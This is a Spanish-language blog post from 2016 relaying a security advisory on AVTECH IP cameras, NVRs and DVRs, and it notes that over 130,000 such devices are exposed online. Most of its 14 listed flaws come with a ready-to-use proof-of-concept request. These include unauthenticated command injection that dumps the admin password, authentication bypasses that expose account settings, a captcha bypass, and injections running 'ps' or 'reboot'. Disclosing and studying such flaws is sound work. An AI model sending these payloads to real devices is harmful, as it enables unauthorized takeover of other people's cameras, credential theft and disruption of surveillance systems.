martes, 11 de octubre de 2016

Multiples vulnerabilidades en camaras IP , NVR, DVR marca AVTECH

11:09 jcc No comments

Producto afectado:

Plataforma y Firmware en cualquier dispositivo camaras IP , NVR, DVR marca AVTECH

Avtech es el segundo término de búsqueda mas popular en Shodan. De acuerdo con Shodan, mas de 130,000 dispositivos AVTECH estan expuestos a internet.

Listado de Vulnerabilidades

1) Plaintext storage of administrative password 2) Missing CSRF protection 3) Unauthenticated information disclosure
POC:
GET /cgi-bin/nobody/Machine.cgi?action=get_capability
4) Unauthenticated SSRF in DVR devices
POC: http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw== 

 5) Unauthenticated command injection in DVR devices 
POC: http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin 

 6) Authentication bypass #1 
POC: http://<device_ip>/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
 
 7) Authentication bypass #2 
POC: http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.* 

 8) Unauthenticated file download from web root 
POC:
http://<device_ip>/cgi-bin/cgibox?.cab  

9) Login captcha bypass #1 
POC: http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick 

10) Login captcha bypass #2 
11) Authenticated command injection in CloudSetup.cgi
POC: 
http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps 

12) Authenticated command injection in adcommand.cgi 
POC: POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1 Host: <device_ip> Content-Length: 23 Cookie: SSID=YWRtaW46YWRtaW4= DoShellCmd "strCmd=ps&" 

 13) Authenticated command injection in PwdGrp.cgi POC: http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN 

14) HTTPS used without certificate verification





Video







fuente:http://www.search-lab.hu/

Posted in: , , , , ,

0 comentarios :

Publicar un comentario

Twitter Delicious Facebook Digg Stumbleupon Favorites More
RSS Feed Subscribe to Our RSS feed!
Sígueme en Twitter! Sígueme en Twitter!

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host